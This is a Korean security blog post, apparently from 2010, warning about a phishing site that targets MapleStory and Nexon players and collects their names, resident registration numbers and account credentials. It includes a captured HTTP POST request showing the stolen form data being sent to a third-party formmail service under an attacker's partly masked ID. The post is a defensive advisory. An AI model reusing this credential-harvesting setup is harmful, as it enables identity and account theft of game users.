본문 바로가기

벌새::Analysis

메이플스토리 & 넥슨 계정 정보 탈취용 국내 피싱 사이트 주의 (2010.5.2)

반응형
넥슨(Nexon)에서 제공하는 온라인 게임 메이플스토리(MapleStory) 상에서 불법적인 방법으로 이득을 볼 수 있다고 사용자를 속여 특정 사이트로 유도하여 개인정보 및 메이플스토리를 비롯한 넥슨 계정 정보를 탈취하는 피싱(Phishing) 사이트가 발견되었으므로 주의하시기 바랍니다.
해당 피싱 사이트 도메인은 넥슨 도메인과 유사한 이름으로 구성되어 있으며, 접속시 블루웹 폼메일을 통해 사용자 이름, 주민등록번호, 메이플 계정 정보, 넥슨 계정 정보를 입력하도록 유도하고 있습니다.
해당 양식에 정보를 입력하면 주민등록번호의 유효성을 체크한 후 정확하게 입력된 경우 그림과 같은 확인창이 생성되는 것을 확인할 수 있습니다.
확인 버튼을 클릭하면 자동으로 넥슨 사이트로 이동을 시켜서 실제 원하는 불법적인 동작이 성공한 것처럼 사용자를 속이고 있습니다.

하지만 알려진 바에 따르면 입력한 정보를 바탕으로 계정 접속을 방해하고 피해를 유발할 수 있으므로 매우 주의하시기 바랍니다.
실제 해당 양식에 정보를 입력할 경우에 블루웹 폼에 입력된 특정 ID로 해당 정보가 전송되는 것을 확인할 수 있습니다.

[양식 입력 정보 전송값]

POST /formmail/send.php?dataname=(전송 받는 ID : cksdud****) HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://db.blueweb.co.kr/formmail/formmail.html?dataname=cksdud****
Accept-Language: ko

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: db.blueweb.co.kr
Content-Length: 391
Connection: Keep-Alive
Cache-Control: no-cache

user_name=(입력한 이름)&user_jumin1=(주민등록번호 앞자리)&user_jumin2=(주민등록번호 뒷자리)&user_email=(전송 받는 ID : cksdud****)&user_text(생략)
HTTP/1.1 200 OK
Date: Sat, 01 May 2010 15:45:58 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.19.1a PHP/5.1.6 mod_ssl/2.8.30 OpenSSL/0.9.7a
X-Powered-By: PHP/5.1.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

이렇게 수집된 온라인 게임 계정 정보를 바탕으로 아이템 탈취를 비롯한 불법 행위 및 수집된 개인정보를 통해 타 인터넷 서비스에도 적용이 가능하므로 사용자는 외부 서비스 또는 프로그램에 계정 정보를 입력하는 일이 없도록 주의하시기 바랍니다.

참고로 해당 피싱에 정보를 입력한 사용자는 동일한 비밀번호를 사용하는 타 인터넷 사이트 계정 정보를 반드시 수정하시기 바라며, 앞으로 입력된 주민등록번호를 바탕으로 악의적인 행위가 있을 수 있으므로 주의가 요구됩니다.
728x90
반응형